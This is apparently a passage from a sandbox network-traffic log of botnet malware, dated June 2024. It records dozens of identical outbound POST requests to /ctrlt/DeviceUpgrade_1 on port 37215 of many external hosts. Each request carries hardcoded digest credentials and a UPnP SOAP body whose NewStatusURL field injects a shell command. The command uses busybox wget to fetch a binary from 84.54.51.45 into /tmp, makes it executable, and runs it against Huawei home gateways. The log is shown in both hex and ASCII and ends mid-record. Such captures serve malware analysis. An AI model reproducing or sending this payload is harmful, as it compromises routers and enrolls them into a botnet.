2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2464192.168.2.154382641.52.128.14237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.815596104 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2465192.168.2.155356841.230.157.11137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.815620899 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2466192.168.2.153943041.158.128.5037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.816360950 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2467192.168.2.153386441.235.29.22437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.816385984 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2468192.168.2.155099041.217.102.14237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.816416025 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2469192.168.2.155100441.163.158.8737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.816446066 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2470192.168.2.154230041.19.149.8237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.816471100 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2471192.168.2.153461841.191.20.23037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.816507101 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2472192.168.2.155025441.148.170.15937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.816519022 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2473192.168.2.153346441.243.201.21737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.816541910 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2474192.168.2.153536841.225.76.25437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.816569090 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
